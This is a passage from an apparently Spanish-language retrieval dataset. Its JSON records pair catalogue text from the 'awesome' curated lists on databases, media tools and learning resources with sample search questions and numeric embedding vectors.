-0.19524, -0.12831, 0.16257, 0.14776, -0.0619, -0.01617, -0.01011, 0.08771, -0.06862, -0.04302, -0.02599, -0.16258, -0.11714, -0.03214, -0.09634, -0.01268, 0.0319, -0.07984, -0.0727, 0.09844, 0.00436, 0.09442, 0.09852, 0.02708, -0.01778, 0.1147, 0.04144, 0.0668, -0.08396, -0.02836, -0.09317, -0.04828, 0.18739, 0.00068, -0.07266, -0.08379, 0.00158, 0.09289, 0.0532, -0.01546, -0.02665, -0.0255, 0.01234, 0.0721, -0.03612, 0.11879, -0.14403, -0.05186, 0.01948, -0.1003, -0.03518, 0.0999, -0.1385, 0.04865, -0.00874, 0.03375, 0.00174, 0.01912, 0.02417, 0.02946, -0.05892, -0.0669, -0.10466, -0.16351, 0.00765, 0.00318, 0.03016, -0.03078, 0.06093, 0.04055, -0.07869, -0.04977, 0.05967, -0.01113, -0.01415, 0.0725, -0.12521, -0.04343, 0.03579, 0.09833, 0.01548, 0.01372, 0.14778, -0.05337, -0.07089, -0.03076, 0.09876, -0.03671, 0.09092, 0.01533, 0.02066, -0.00601, -0.03159, 0.06619, -0.05374, 0.04093, -0.01299, -0.06987, 0.00372, -0.02345, 0.01933, 0.03117, -0.00132, -0.02202, -0.05967, -0.0444, 0.0288, 0.02233, 0.0046, 0.02437, -0.00617, 0.01157, -0.0531, 0.08446, 0.09869, 0.04867, 0.01553, -0.08569, 0.02753, 0.02968, -0.0268, -0.07535, -0.06054, -0.08418, -0.00172, 0.03668, -0.00864, -0.0211, -0.00765, -0.03677, 0.06167, 0.04563, -0.03046, 0.09477, -0.10666, -0.00664, -0.00633, 0.02978, -0.05165, -0.11677, -0.01074, -0.02971, 0.09528, -0.07979, 0.04196, -0.04866, 0.01969, -0.0948, 0.0799, 0.13088, -0.05038, 0.01215, 0.03222, 0.00298, 0.01103, 0.02537, -0.01277, -0.03832, 0.01046, 0.07755, 0.11592, 0.05599, 0.00854, 0.07804, -0.07085, 0.0443, -0.10508, 0.01997, -0.0327, -0.00607, 0.01633, -0.06274, 0.02621, 0.04248, -0.02495, 0.06115, -0.00535, -0.00377, 0.07482, -0.11151, -0.04754, -0.03217, -0.08403, 0.01668, 0.00267, 0.00348, -0.08892, 0.01196, -0.01331, -0.11979, 0.014, -0.01072, -0.00318, -0.01145, -0.021, 0.00157, 0.0697, 0.01359, 0.01714, 0.06067, -0.00627, 0.09703, 0.01691, -0.02143, 0.01653, 0.03089, 0.01679, 0.04424, -0.05605, 0.05088, 0.04586, -0.00412, -0.0114, -0.00905, 0.02323, 0.02509, -0.0004, -0.0399, 0.02283, 0.04014, -0.02675, 0.03913, 0.06692, -0.00176, -0.00642, -0.04164, 0.03982, 0.00725, -0.036, 0.01647, 0.03203, -0.04276, 0.01986, -0.04016, -0.00716, -0.07866, 0.00817, -0.01665, -0.0214, -0.08439, 0.00532, 0.03395, 0.01767, -0.00977, -0.03203]} +{"tipo": "pregunta", "herramienta": "Databases", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Databases", "tema": "databases", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Databases: Database. MySQL. SQLAlchemy. InfluxDB. Neo4j. MongoDB β€” NoSQL database. RethinkDB. TinkerPop β€” Graph computing framework. PostgreSQL β€” Object-relational database. CouchDB β€” Document-oriented NoSQL database. HBase β€” Distributed, scalable, big data store. NoSQL Guides β€” Help on using non-relational, distributed, open-source, and horizontally scalable databases. Database Tools β€” Everything that makes working with databases easier. TypeDB β€” Logical database to organize large and complex networks of data as one body of knowledge. Cassandra β€” Open-source, distributed, wide column store, NoSQL database management system. Supabase β€” An open-source alternative to Firebase. PocketBase β€” An open-source, Go-based backend in one file. Neon β€” An open-source alternative to AWS Aurora.", "indexar": "con quΓ© puedo montar un backend simple en un solo archivo?", "v": [0.06904, 0.07143, -0.07264, -0.03598, -0.23372, -0.02453, -0.00617, 0.03255, -0.14682, -0.14424, -0.11597, -0.04205, 0.03897, -0.01973, 0.07307, 0.06742, 0.08085, -0.07613, 0.11911, -0.0046, 0.01555, -0.00997, -0.08867, -0.06729, 0.05408, -0.01487, 0.06175, 0.1037, -0.17385, 0.03042, -0.02865, 0.07534, 0.0856, 0.16028, -0.07439, 0.01158, 0.13729, 0.02907, -0.12497, 0.00824, -0.05829, -0.00547, -0.03187, 0.093, -0.0756, -0.03455, 0.09496, 0.01028, 0.03104, 0.01556, 0.06123, -0.10643, -0.08983, -0.03988, -0.0099, -0.04001, 0.09602, -0.20729, 0.15214, 0.02274, -0.07321, 0.15674, -0.01757, 0.09555, 0.01839, -0.0563, -0.01215, 0.05347, -0.11822, 0.04312, -0.08862, 0.01745, 0.06677, -0.06142, -0.04367, 0.08102, 0.00985, -0.08227, -0.02165, 0.10877, -0.03149, -0.0329, -0.0005, 0.05236, -0.08313, -0.05317, -0.05701, -0.00924, 0.02691, -0.02923, 0.07082, 0.01676, -0.04248, -0.02454, 0.02604, -0.07881, 0.01915, 0.08846, -0.07193, -0.0867, -0.16386, 0.00024, 0.01394, 0.05141, 0.14934, 0.05718, 0.04579, -0.00133, -0.06661, -0.04238, -0.01451, 0.06165, 0.03032, 0.12087, -0.08447, -0.07969, 0.00846, 0.03987, 0.0423, -0.03691, 0.0202, 0.04978, 0.05732, 0.08035, -0.01191, -0.05467, 0.06361, 0.12528, -0.0725, 0.01257, -0.00047, -0.03507, -0.04509, -0.02714, 0.00585, 0.03373, 0.07326, -0.00847, -0.0122, -0.02035, 0.09958, -0.05472, -0.03414, 0.02526, 0.05957, 0.00095, -0.0048, -0.08906, -0.01847, -0.0621, 0.0582, 0.06859, -0.01015, -0.07116, -0.1053, -0.00262, 0.09064, -0.09172, 0.01273, 0.03625, -0.02043, 0.08794, -0.09098, -0.00203, 0.0116, -0.05926, -0.0747, -0.03992, 0.01705, -0.04976, 0.02539, 0.02236, 0.01898, -0.13039, 0.04936, 0.03517, -0.04821, -0.05207, 0.02235, 0.01633, 0.05306, -0.0175, 0.06535, 0.06054, -0.02122, -0.05481, 0.08187, -0.00906, -0.03424, 0.0347, -0.0421, 0.03985, 0.00177, -0.01144, 0.05361, 0.02462, -0.02603, 0.06624, -0.02015, 0.01489, 0.04678, -0.05263, 0.00644, 0.02484, 0.01942, -0.0644, -0.0854, 0.05491, 0.0471, 0.0099, 0.04025, 0.0136, 0.04284, 0.00422, 0.01659, 0.05539, -0.01506, 0.06077, -0.02461, 0.01079, -0.01329, 0.01719, 0.05101, -0.00128, 0.05922, 0.01953, 0.01607, 0.0002, -0.04391, 0.00125, 0.01484, 0.00888, -0.01249, 0.01588, 0.05002, -0.0529, 0.00365, 0.01755, -0.01597, -0.00554, 0.02347, 0.03328, 0.02852, -0.01401, 0.01076, -0.02892, -0.04079, 0.0644, -0.0144, -0.08371, -0.04721, -0.05955, -0.03864, -0.00455, -0.01179, -0.02972]} +{"tipo": "pregunta", "herramienta": "Media", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Media", "tema": "media", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Media: Fonts. Codeface β€” Text editor fonts. Stock Resources. GIF β€” Image format known for animated images. Music. Open Source Documents. Audio Visualization. Broadcasting. Pixel Art β€” Pixel-level digital art. FFmpeg β€” Cross-platform solution to record, convert and stream audio and video. Icons β€” Downloadable SVG/PNG/font icon projects. Audiovisual β€” Lighting, audio and video in professional environments. VLC β€” Cross-platform media player software and streaming server. Audio Over IP β€” Reliably transmit uncompressed, low-latency audio over an IP (layer 3) network.", "indexar": "que programa sirve para crear arte de nivel pΓ­xel", "v": [-0.12528, -0.07985, -0.11218, -0.10973, 0.10226, -0.22785, 0.03049, -0.11528, -0.03936, -0.115, 0.03319, -0.05436, -0.03793, -0.16391, 0.09838, -0.04262, -0.06338, -0.12478, 0.16519, 0.05163, -0.03743, 0.06293, -0.11224, -0.12187, -0.08283, 0.00623, 0.094, -0.05435, -0.07671, 0.08069, 0.00698, 0.01209, 0.03338, -0.17021, 0.05464, -0.15188, 0.0459, -0.01523, -0.0449, 0.07127, -0.0755, 0.02224, 0.00679, 0.04988, 0.04387, -0.02591, 0.06076, 0.01967, 0.00993, 0.06652, 0.03744, 0.01964, -0.02747, 0.01017, 0.08173, -0.03757, -0.02854, -0.15084, -0.02015, -0.0446, 0.0347, -0.03256, -0.08726, -0.1109, 0.05624, -0.04895, 0.04901, -0.04416, -0.09157, 0.07927, -0.03788, -0.0291, 0.04729, -0.01622, 0.00471, -0.00185, -0.11979, -0.11602, -0.05599, -0.1547, 0.0251, 0.02169, -0.06707, 0.02111, -0.03492, -0.0892, -0.02006, -0.10104, 0.01658, -0.10505, 0.02839, 0.11404, 0.00984, 0.04561, 0.09181, 0.00472, 0.01281, 0.00826, 0.047, 0.09713, 0.06992, -0.128, -0.14384, 0.00614, -0.02226, 0.07731, 0.11431, 0.04846, -0.05249, 0.0777, 0.01795, 0.05571, -0.0222, 0.01418, -0.04875, -0.04386, 0.03143, -0.05557, 0.03677, -0.00799, 0.01752, 0.06073, 0.00576, 0.0411, 0.00127, 0.01732, -0.00732, 0.11534, 0.00504, 0.08002, -0.02838, 0.01605, -0.00502, 0.00597, -0.07952, -0.11204, 0.13535, -0.0185, -0.05952, 0.01486, 0.0386, 0.13148, 0.03939, -0.05147, -0.0397, 0.01163, 0.00716, -0.06279, 0.02655, 0.01561, -0.01665, 0.02285, 0.06348, 0.02886, -0.08858, -0.0092, -0.03522, -0.01636, 0.02156, 0.00259, -0.05805, 0.05039, 0.02489, -0.0161, 0.03195, -0.03692, -0.06086, 0.05068, 0.11437, 0.08638, -0.06001, -0.00511, 0.05822, -0.09772, 0.01093, -0.01618, -0.03462, -0.1209, 0.04416, -0.04472, -0.07233, -0.01644, 0.00759, -0.01053, -0.05603, -0.10963, -0.00807, 0.03358, 0.0334, 0.02123, -0.11048, 0.04092, -0.06468, 0.02809, 0.00698, -0.06062, 0.04489, -0.00495, 0.01913, -0.02625, -0.00439, -0.05854, 0.01933, -0.02017, 0.00254, 0.06502, -0.03185, -0.05703, 0.00945, 0.07637, 0.032, 0.02848, 0.01459, 0.00171, 0.06333, 0.02862, 0.01311, -0.04133, 0.02688, 0.05106, -0.04216, -0.04377, -0.06069, 0.00135, 0.05087, -0.07933, 0.01231, -0.02628, 0.04057, 0.00823, -0.00488, -0.0286, 0.01379, -0.04199, 0.02927, -0.00131, 0.02096, -0.04634, -0.0132, -0.05476, 0.02943, 0.07, -0.01039, -0.04375, 0.02937, 0.00605, 0.00058, -0.00818, 0.02151, 0.01004, -0.0113, 0.0436, 0.03355, 0.00703, 0.06131, 0.07155]} +{"tipo": "pregunta", "herramienta": "Media", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Media", "tema": "media", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Media: Fonts. Codeface β€” Text editor fonts. Stock Resources. GIF β€” Image format known for animated images. Music. Open Source Documents. Audio Visualization. Broadcasting. Pixel Art β€” Pixel-level digital art. FFmpeg β€” Cross-platform solution to record, convert and stream audio and video. Icons β€” Downloadable SVG/PNG/font icon projects. Audiovisual β€” Lighting, audio and video in professional environments. VLC β€” Cross-platform media player software and streaming server. Audio Over IP β€” Reliably transmit uncompressed, low-latency audio over an IP (layer 3) network.", "indexar": "con que puedo grabar y convertir video o audio", "v": [0.13988, 0.03875, -0.09289, -0.04918, 0.02182, -0.01248, 0.02593, 0.06354, 0.04133, -0.18733, 0.02289, -0.13299, -0.01907, 0.01324, 0.03544, 0.1062, -0.00697, -0.01567, -0.0463, 0.09737, 0.10642, 0.05949, 0.05494, -0.11333, 0.02578, -0.01554, 0.0313, 0.0102, -0.08356, -0.01471, -0.00536, 0.06329, -0.00195, -0.11571, -0.12408, -0.10258, 0.01004, 0.02223, -0.04511, 0.13785, -0.02907, 0.07576, -0.03591, 0.0117, 0.01067, -0.04815, 0.06403, -0.01338, -0.09682, -0.00981, 0.04949, 0.00848, -0.04194, 0.00621, -0.03627, -0.08526, 0.09314, -0.14363, 0.04663, -0.05117, 0.06854, -0.01913, 0.03408, -0.00847, 0.04978, 0.09854, 0.00972, 0.04539, -0.08012, 0.0103, -0.12337, 0.06262, 0.01354, 0.07624, 0.05579, 0.01225, -0.10898, -0.1365, -0.03869, -0.04499, -0.01315, -0.12188, 0.02519, 0.00414, -0.05862, 0.09951, 0.00598, 0.00633, -0.00679, -0.09433, 0.03118, 0.06962, 0.0794, -0.06089, 0.07692, -0.07967, 0.13131, 0.06171, -0.02219, -0.08334, 0.01006, 0.04228, -0.09317, 0.10035, 0.04488, 0.11556, 0.04685, -0.10277, 0.03879, 0.01841, 0.00142, 0.15235, -0.06712, -0.05253, -0.0545, -0.03253, -0.02677, -0.09536, 0.01981, 0.06403, 0.00369, 0.03333, -0.07279, -0.10753, -0.06431, -0.00949, -0.07002, -0.00213, -0.01199, 0.10933, -0.00799, -0.00826, 0.03829, -0.12183, 0.0717, -0.04008, 0.03608, 0.05375, -0.00509, -0.04812, 0.01213, 0.0733, 0.03343, -0.06035, 0.07026, -0.05962, 0.02198, -0.03411, -0.06782, -0.01866, -0.0231, 0.03145, -0.09648, -0.07216, -0.0297, 0.03808, 0.07346, -0.12055, -0.02763, 0.03026, 0.04661, 0.03794, -0.00028, -0.06573, -0.00543, -0.00272, -0.08506, 0.00931, -0.02654, -0.05403, -0.01048, -0.07637, 0.07392, -0.07558, -0.05428, -0.04938, -0.02503, -0.03552, 0.10141, -0.09618, -0.07262, 0.07854, -0.02138, 0.0236, 0.03682, 0.04595, 0.03598, -0.023, -0.06294, 0.02344, 0.0189, 0.01657, -0.02691, -0.01569, 0.00684, -0.08964, -0.09986, -0.02098, -0.07912, 0.054, -0.06254, -0.05251, -0.05715, -0.06549, 0.03409, 0.00472, -0.0976, 0.03415, 0.04579, -0.03271, -0.00442, 0.00209, -0.01463, -0.03031, 0.00396, 0.00155, 0.03653, 0.07967, -0.0666, 0.03505, 0.06355, 0.05856, 0.09414, -0.04604, -0.00921, 0.05884, 0.05619, 0.02818, -0.03859, -0.01353, -0.04477, 0.05941, -0.0757, -0.05725, 0.01208, 0.08096, -0.05028, -0.00044, -0.10637, -0.03761, 0.06148, 0.07748, -0.06786, -0.00109, -0.01077, -0.0504, -0.04017, 0.08411, 0.07353, -0.13527, 0.00719, 0.08162, 0.08165, 0.03539, 0.01366, -0.04486]} +{"tipo": "pregunta", "herramienta": "Media", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Media", "tema": "media", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Media: Fonts. Codeface β€” Text editor fonts. Stock Resources. GIF β€” Image format known for animated images. Music. Open Source Documents. Audio Visualization. Broadcasting. Pixel Art β€” Pixel-level digital art. FFmpeg β€” Cross-platform solution to record, convert and stream audio and video. Icons β€” Downloadable SVG/PNG/font icon projects. Audiovisual β€” Lighting, audio and video in professional environments. VLC β€” Cross-platform media player software and streaming server. Audio Over IP β€” Reliably transmit uncompressed, low-latency audio over an IP (layer 3) network.", "indexar": "cual es una alternativa libre a los editores multimedia comerciales", "v": [0.06892, -0.00109, 0.0082, -0.05056, -0.12775, -0.00728, -0.03783, 0.03128, -0.23961, -0.16959, -0.0535, -0.13099, 0.07472, -0.07592, 0.06587, -0.03522, 0.15638, -0.13445, 0.12616, -0.00634, 0.08947, -0.03246, -0.13723, -0.05642, 0.01047, -0.10249, -0.03065, -0.02016, -0.05525, 0.12853, 0.01844, 0.05102, 0.0245, -0.07281, -0.02151, -0.02408, 0.07895, 0.06264, 0.01922, -0.03795, 0.0509, -0.06407, -0.09506, -0.04514, 0.04076, 0.00508, -0.05893, 0.02881, -0.07591, 0.11363, 0.03761, -0.00521, -0.13592, 0.02848, 0.15317, -0.01288, 0.09987, -0.02263, -0.10726, -0.00559, 0.02963, 0.11298, 0.03137, -0.06557, 0.03369, 0.04758, -0.01843, -0.15884, -0.08737, 0.08403, -0.00416, -0.03383, 0.10346, -0.03393, -0.07373, 0.06271, -0.13968, -0.02878, -0.05169, 0.04644, 0.07693, -0.04671, 0.00193, 0.08992, -0.00635, -0.12537, -0.02633, -0.08022, -0.15718, 0.06092, 0.07684, 0.0637, -0.072, 0.00405, 0.00633, -0.10744, 0.06139, -0.02122, 0.04076, 0.1834, 0.04352, 0.01429, -0.11112, -0.05098, -0.00118, -0.05685, 0.00164, -0.06411, -0.04719, 0.01071, 0.04264, 0.11302, 0.03748, 0.03833, -0.05959, 0.01923, -0.00161, -0.01442, 0.02342, -0.00523, -0.0539, -0.00887, -0.0225, 0.01226, 0.03225, 0.0684, 0.03843, 0.02768, -0.06738, 0.01274, 0.0768, -0.03638, 0.0224, -0.05271, -0.08569, -0.04112, 0.06942, -0.0708, 0.03422, -0.00333, -0.04765, -0.01986, -0.04112, 0.02671, 0.07153, -0.03247, -0.02109, -0.07668, -0.03513, 0.01073, -0.06143, -0.00878, -0.07534, 0.06043, -0.00907, 0.05727, -0.02733, -0.01928, -0.03541, 0.07469, 0.01747, 0.00988, 0.03345, -0.01258, 0.00765, -0.07142, -0.0188, -0.04616, -0.0172, -0.04178, -0.04845, 0.02823, 0.03444, -0.07178, 0.07551, -0.03378, -0.05798, 0.00096, 0.073, -0.01247, 0.00776, 0.002, -0.13816, -0.00306, -0.0445, -0.09179, -0.02426, -0.03559, 0.00716, 0.00233, -0.05446, 0.08139, -0.12949, -0.12211, 0.00499, -0.0252, -0.05066, -0.04296, -0.01938, 0.00578, -0.06029, -0.00992, 0.04809, 0.00394, 0.02545, 0.0107, -0.01768, 0.09846, 0.03673, 0.04094, -0.03071, 0.00207, 0.01528, 0.01926, -0.06432, 0.00904, 0.05292, -0.0363, -0.01072, 0.00612, 0.10489, 0.00512, 0.03338, -0.06051, -0.01408, -0.02364, 0.02437, 0.09335, -0.01249, 0.01323, -0.04828, 0.02958, 0.00084, 0.03773, 0.02526, 0.02721, 0.05438, 0.04559, 0.01701, -0.02607, 0.07996, 0.03148, -0.05903, -0.01442, 0.00465, -0.02214, -0.08268, 0.00578, -0.05984, -0.0646, -0.01582, 0.04007, 0.00534, -0.02426, 0.06585, -0.00357]} +{"tipo": "pregunta", "herramienta": "Learn", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Learn", "tema": "learn", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Learn: CLI Workshoppers β€” Interactive tutorials. Learn to Program. Speaking. Tech Videos. Computer History. Programming for Kids. STEAM β€” Supplements for specific science, technology, engineering, arts, and math (STEAM) courses across all grade levels. Educational Games β€” Learn while playing. JavaScript Learning. CSS Learning β€” Mainly about CSS – the language and the modules. Product Management β€” Learn how to be a better product manager. Roadmaps β€” Gives you a clear route to improve your knowledge and skills. YouTubers β€” Watch video tutorials from YouTubers that teach you about technology. Hackathon β€” Running fun and productive hackathons. Certificates β€” Free computer science certifications to showcase your knowledge.", "indexar": "que programa me ayuda a aprender programaciΓ³n para niΓ±os", "v": [0.02705, 0.12452, -0.08643, -0.24817, -0.05011, -0.07569, -0.04033, 0.06254, -0.07475, -0.11613, 0.01187, -0.0052, 0.00997, -0.07371, -0.06921, -0.03918, 0.04914, 0.00202, 0.11774, 0.06763, -0.01501, 0.00732, -0.03853, 0.02482, -0.01403, -0.03912, 0.03059, 0.02328, 0.00815, 0.07787, -0.03935, 0.0533, 0.04367, -0.08033, -0.0605, 0.02806, 0.03617, -0.01339, -0.03097, 0.03354, -0.07519, 0.06276, 0.01639, -0.04125, 0.03163, 0.09989, 0.07374, 0.04894, -0.02467, -0.07223, 0.01006, 0.06704, 0.1083, -0.11786, 0.02133, -0.06618, -0.03798, -0.14712, -0.07589, -0.05093, -0.03899, 0.01672, 0.01839, -0.05548, 0.13681, 0.06376, 0.15759, 0.02737, -0.10726, 0.09416, -0.02282, 0.0427, -0.01427, -0.1045, -0.04414, 0.02583, -0.04169, -0.07162, 0.12147, -0.13568, -0.09943, 0.01201, 0.03028, 0.03692, 0.04091, 0.02969, -0.05686, 0.03928, 0.04305, -0.10311, -0.03092, 0.1396, -0.03945, -0.06078, 0.04248, -0.02348, 0.1186, -0.01208, 0.04918, 0.05498, -0.03015, -0.15895, -0.0557, 0.03516, -0.00942, 0.14079, 0.09694, -0.09219, -0.15393, 0.05131, -5e-05, -0.04256, -0.04319, -0.06806, -0.09094, 0.00234, 0.0248, 0.00844, -0.01515, -0.07631, -0.07863, 0.10459, -0.03596, 0.06253, 0.07683, 0.08336, 0.02343, 0.18951, -0.05395, 0.10623, 0.00066, -0.03436, -0.00306, -0.01952, 0.01311, 0.00591, 0.01075, -0.00119, -0.04222, -0.0298, 0.01468, -0.01367, 0.0344, 0.02827, -0.02085, 0.01566, 0.09595, -0.02677, 0.0501, 0.06796, -0.04087, -0.00034, 0.09665, 0.06419, -0.04985, -0.00454, 0.024, -0.00077, -0.06047, 0.00577, -0.09402, 0.0197, 0.0604, -0.12326, 0.04198, -0.07825, -0.0266, 0.08226, 0.03466, 0.08267, -0.08108, 0.10126, 0.06874, -0.00603, -0.02171, -0.0645, -0.06126, -0.10396, -0.0429, -0.04355, -0.09647, 0.017, -0.00096, 0.04724, -0.0511, -0.04053, -0.02501, -0.03587, 0.00863, 0.00374, -0.04458, 0.01923, -0.03553, -0.06629, -0.05107, -0.00992, -0.02926, 0.00511, 0.06663, -0.02513, -0.03505, 0.02919, 0.02716, -0.08131, 0.01018, 0.09244, -0.00374, 0.035, 0.03798, 0.06481, 0.0887, -0.03155, 0.02644, 0.01318, -0.01274, -0.00861, -0.05282, 0.035, 0.01331, 0.09918, -0.01776, 0.00374, 0.05125, 0.0141, -0.03476, -0.13268, 0.07211, 0.03998, 0.07887, 0.05808, -0.01641, -0.04397, -0.01365, -0.07085, 0.01785, 0.0065, -0.03668, -0.0364, -0.01133, -0.04497, -0.00716, 0.10494, -0.0133, -0.04733, 0.00582, -0.04031, -0.02941, -0.01743, 0.02516, -0.00106, -0.03569, 0.0205, 0.01432, -0.05643, 0.02882, 0.00206]} +{"tipo": "pregunta", "herramienta": "Learn", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Learn", "tema": "learn", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Learn: CLI Workshoppers β€” Interactive tutorials. Learn to Program. Speaking. Tech Videos. Computer History. Programming for Kids. STEAM β€” Supplements for specific science, technology, engineering, arts, and math (STEAM) courses across all grade levels. Educational Games β€” Learn while playing. JavaScript Learning. CSS Learning β€” Mainly about CSS – the language and the modules. Product Management β€” Learn how to be a better product manager. Roadmaps β€” Gives you a clear route to improve your knowledge and skills. YouTubers β€” Watch video tutorials from YouTubers that teach you about technology. Hackathon β€” Running fun and productive hackathons. Certificates β€” Free computer science certifications to showcase your knowledge.", "indexar": "con quΓ© puedo hacer un curso interactivo de CSS", "v": [0.00074, 0.01278, -0.07663, 0.01519, -0.07018, -0.26867, -0.01568, 0.09445, 0.07333, -0.03576, -0.11002, -0.01689, -0.1413, -0.07859, 0.00493, 0.01736, 0.2026, 0.05379, 0.0621, 0.00403, 0.01746, -0.18088, -0.15497, -0.0308, -0.01232, -0.04046, -0.11408, -0.0924, -0.05026, 0.06726, -0.12814, 0.08231, 0.09354, 0.10596, -0.03667, -0.0369, -0.08254, 0.08529, -0.04476, 0.04447, -0.07938, 0.03886, -0.09624, 0.00732, -0.03953, -0.14402, -0.0049, -0.09892, -0.05975, -0.00746, -0.00617, 0.02339, -0.12249, -0.04174, -0.03047, 0.06362, -0.00873, -0.21968, 0.00163, -0.12561, 0.05881, 0.06618, -0.10482, 0.14864, -0.01297, -0.05632, 0.03047, 0.03889, -0.01694, 0.08431, 0.02747, -0.02384, -0.08095, -0.07469, 0.04824, 0.03733, -0.01652, 0.04155, 0.05857, 0.0018, -0.06184, 0.07089, 0.00268, -0.02525, -0.09111, 0.10267, -0.05957, -0.08249, -0.05534, -0.06108, 0.0352, 0.10154, -0.07013, -0.0785, -0.10461, 0.0021, -0.04806, -0.04185, 0.08198, -0.06805, -0.00705, 0.04344, -0.09105, -0.06086, 0.06547, 0.07084, 0.04483, 0.08085, -0.05013, 0.04498, 0.10977, 0.05458, -0.09639, 0.00977, 0.00525, 0.01101, -0.01355, 0.03203, -0.01473, -0.04339, -0.07141, 0.07807, -0.07517, -0.05449, 0.14245, 0.12134, 0.03168, 0.0542, -0.09775, 0.05027, -0.10118, -0.03582, -0.01301, -0.07709, -0.0081, -0.03133, 0.05173, 0.01658, -0.04891, 0.0295, -0.05641, 0.02263, 0.02285, 0.04109, -0.00078, -0.02361, 0.07653, -0.01916, -0.02785, 0.00493, -0.00061, 0.04098, 0.00358, 0.06791, -0.05233, -0.07116, 0.01497, -0.01845, 0.02254, 0.01944, -0.03284, 0.04482, 0.09206, -0.02646, -0.00761, 0.01083, -0.06592, 0.0276, -0.02812, 0.03546, 0.01351, 0.054, 0.01295, -0.04234, 0.05239, -0.0136, -0.02599, -0.04578, -0.08695, -0.04345, 0.04098, 0.0096, -0.01875, 0.02374, 0.04006, -0.06018, -0.02542, -0.00356, -0.04323, 0.01572, -0.08812, 0.05503, -0.085, -0.01494, 0.0283, 0.01985, -0.00095, 0.00055, 0.04909, -0.00544, 0.01341, 0.04719, 0.0882, -0.05346, -0.01763, 0.01769, -0.00025, 0.05344, 0.00737, -0.0153, -0.00429, -0.01489, 0.08772, -0.00752, 0.03185, 0.0499, -0.01527, 0.07337, 0.02381, 0.04145, 0.04198, 0.02987, -0.01774, 0.02531, 0.05532, -0.03428, -0.01816, 0.00609, 0.02502, 0.05288, -0.01415, -0.08618, 0.01072, 0.00672, 0.05964, -0.01886, 0.01148, 0.0205, -0.05944, 0.02128, 0.00944, 0.02807, 0.02601, 0.02833, -0.00455, -0.06874, -0.02456, -0.0165, -0.02316, -0.02334, -0.06336, -0.07863, 0.03507, 0.02895, -0.06332, 0.02397]} +{"tipo": "pregunta", "herramienta": "Learn", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Learn", "tema": "learn", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Learn: CLI Workshoppers β€” Interactive tutorials. Learn to Program. Speaking. Tech Videos. Computer History. Programming for Kids. STEAM β€” Supplements for specific science, technology, engineering, arts, and math (STEAM) courses across all grade levels. Educational Games β€” Learn while playing. JavaScript Learning. CSS Learning β€” Mainly about CSS – the language and the modules. Product Management β€” Learn how to be a better product manager. Roadmaps β€” Gives you a clear route to improve your knowledge and skills. YouTubers β€” Watch video tutorials from YouTubers that teach you about technology. Hackathon β€” Running fun and productive hackathons. Certificates β€” Free computer science certifications to showcase your knowledge.", "indexar": "cual es una alternativa libre para obtener certificaciones informΓ‘ticas", "v": [-0.06211, 0.10211, -0.11195, -0.10475, 0.1189, -0.23175, -0.02712, -0.09106, -0.23273, -0.0329, 0.02672, -0.1441, -0.02037, -0.00113, 0.08131, -0.04435, 0.0924, -0.13126, 0.11101, -0.01504, 0.02793, 0.00864, -0.12783, -0.1405, -0.08973, 0.00492, -0.10714, -0.0182, -0.03794, 0.01869, 0.09353, 0.01891, 0.07378, -0.01434, -0.04496, 0.05009, 0.06872, 0.03799, 0.0304, -0.04647, 0.06328, 0.00251, -0.01827, 0.08836, 0.10496, -0.08012, -0.00155, 0.04109, 0.03493, -0.00624, -0.05102, -0.09153, -0.07499, -0.08598, -0.00296, -0.02388, 0.11543, -0.03582, 0.05433, -0.06149, -0.13211, 0.05083, -0.0197, -0.02009, 0.0538, 0.13346, 0.05399, -0.03023, -0.08315, 0.06367, 0.06186, 0.09534, 0.02443, -0.08676, -0.06601, -0.00895, -0.09008, -0.03396, 0.07944, 0.00363, 0.01746, -0.03819, 0.02621, -0.00416, -0.06848, -0.0847, 0.03965, -0.00565, 0.08461, 0.02087, 0.08771, 0.07561, -0.04903, 0.06259, 0.10009, -0.02474, 0.119, 0.0548, -0.06281, 0.06466, -0.05532, 0.04317, -0.13512, 0.01008, -0.07085, 0.01939, 0.0143, -0.00611, -0.02447, 0.04918, 0.00297, 0.09926, -0.06268, 0.00845, -0.00181, -0.03982, 0.02079, -0.03856, -0.00151, 0.02107, -0.02361, -0.0484, -0.04173, -0.02053, 0.08588, 0.09715, 0.05011, 0.05483, -0.06199, -0.03971, 0.05567, -0.12404, -0.03593, -0.07074, -0.09741, -0.00575, 0.02051, -0.16809, 0.00512, -0.02384, 0.00141, 0.05511, -0.04797, 0.00229, 0.04979, 0.02393, 0.04118, -0.03252, 0.00654, -0.04715, -0.1444, 0.02857, -0.05006, 0.11773, -0.1096, 0.06302, -0.06434, -0.00061, -0.08364, 0.08839, -0.03841, -0.05424, 0.00435, -0.00387, -0.03979, -0.00585, -0.00999, -0.00589, -0.02442, 0.03225, -0.01865, 0.07499, 0.00315, -0.10031, 0.03725, -0.01642, 0.01779, -0.03275, -0.04326, -0.06782, 0.00528, 0.05405, -0.04577, 0.001, -0.00905, -0.02549, -0.01706, 0.0044, 0.00672, 0.01368, 0.00255, 0.02298, -0.0809, -0.05249, -0.03272, -0.00199, -0.04203, -0.08875, -0.00967, -0.09442, -0.09086, -0.02544, -0.0619, -0.03996, 0.03307, 0.05707, -0.01498, 0.00015, -0.01094, 0.08085, 0.0148, -0.00462, 0.05342, 0.01304, -0.11857, -0.06274, 0.03421, 0.01624, -0.01019, 0.00093, 0.01602, -0.02804, -0.00408, 0.07076, 0.00821, -0.0114, 0.01923, 0.03873, -0.03029, -0.00574, 0.0235, -0.01888, -0.01628, 